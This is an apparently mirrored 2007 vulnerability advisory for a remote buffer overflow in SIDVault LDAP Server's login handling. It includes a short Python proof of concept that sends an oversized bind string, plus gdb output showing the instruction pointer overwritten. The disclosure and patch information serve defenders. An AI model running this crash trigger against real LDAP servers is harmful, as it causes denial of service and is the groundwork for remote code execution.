Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17900
HistoryAug 27, 2007 - 12:00 a.m.

SIDVault LDAP Server Remote Buffer Overflow

2007-08-2700:00:00
vulners.com
19

SIDVault LDAP Server Remote Buffer Overflow

Product Description:

SIDVault LDAP Server for Win32 and GNU/Linux

SIDVault is a Simple Integration Database, allowing easy management and
installations with high performance LDAP v3 server. It supports any
number of schemas, easy to add/modify existing schemas, integrated web
based user access, and fast browser based administration tools. Supports
all relevant RFC protocols LDAP v2, LDAP v3, HTTP, ILS.

Vulnerable versions:

    Win32 2.0e
    Linux 2.0d

Vulnerability Details:

The login mechanism is prone to multiple buffer-overflow vulnerabilities
because it fails to adequately bounds-check user-supplied input before
copying it to an insufficiently sized buffer.

Successfully exploiting the issue will allow an attacker to execute
arbitrary code with root or SYSTEM-level privileges depending on the
operative system target. Failed exploit attempts will result in a
denial-of-service condition.

Proof of concept:

gdb /usr/local/sidvault/sidvault

(…)
(gdb) r -run

In another terminal:

$ cat poc.py
import ldap

l = ldap.open("localhost")
l.simple_bind("dc=" + "A"*4099, "B"*256)
$ ./poc.py

In the first terminal:

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread -1226736720 (LWP 5942)]
0x41414141 in ?? ()
(gdb) where
#0 0x41414141 in ?? ()
#1 0x41414141 in ?? ()
(…)
Quit
(gdb) i r
eax 0x8202c48 136326216
ecx 0x0 0
edx 0xb6e164df -1226742561
ebx 0x41414141 1094795585
esp 0xb6e16500 0xb6e16500
ebp 0x41414141 0x41414141
esi 0x41414141 1094795585
edi 0x41414141 1094795585
eip 0x41414141 0x41414141

Exploit:

An exploit for Debian based distributions which spawns a remote root
terminal has been writen. See the attached exploit.

Patch information:

The problem is solved in the latest version (2.0f) which is available in
the vendor's website at http://www.alphacentauri.co.nz/.

Thanks:

Thanks to Lynden Sherriff from Alphacentauri Ltd., he where very kind
and professional.

Disclaimer:

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

Contact:

Joxean Koret - joxeankoret[at]yahoo[dot]es